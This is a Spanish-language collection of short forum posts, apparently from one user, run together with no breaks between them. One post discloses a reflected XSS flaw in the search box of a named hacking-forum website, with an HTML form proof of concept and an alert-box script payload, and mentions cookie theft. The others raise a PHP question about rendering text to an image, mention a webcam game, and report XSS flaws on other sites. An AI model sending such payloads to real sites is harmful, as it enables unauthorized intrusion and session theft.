Hace tiempo encontré algunos XSS en elhacker.com y .org pero aún no los reparan a pesar del tiempo que llevan y de que fueron publicados y avisados. Ahora portalhacker.net también tiene un XSS localizado en el buscador de la pagina principal.

PoC:

<form name="buscarform" action="http://www.portalhacker.net/buscar.php" method="post">
<input name="buscar" type="hidden" value="ok">
<input name="query" type="text" size=12 value="Pon tu XSS acá">
<input type="submit" value="Enviar"></form>

Donde puse "Pon tu XSS acá" prueba con enviar la siguiente petición post: "<script>alert(/xss/);</script>"

Después se quejan del porqué les roban las cookies.

No se si han hecho esta pregunta o no pero ya busqué en el foro y no vi nada al respecto.

Como puedo escribir letras en una variable en php para que me de de salida un jpg o png con un testo dentro?, por ejemplo: imagen.php?palabra=hola y que aparezca un jpg que diga hola.

Quiero hacer algo como esto  :

Muy exelente juego para linux donde intentas guiar una persona en miniatura hasta la salida recordando cada pasaje dentro de un cubo real virtualizado desde tu webcam.

Acá les dejo un video impresionante. Realmente es primera ves que veo algo de este tipo.

Encontré un XSS en zone-h  ...muy curioso no?


Lo puse en xssed haber si lo ven antes que lo reparen y despues les aviso.

Por lo que vi hay muchos otros descubierto por otras personas... ya no me dan ganas de usar joomla jajajja.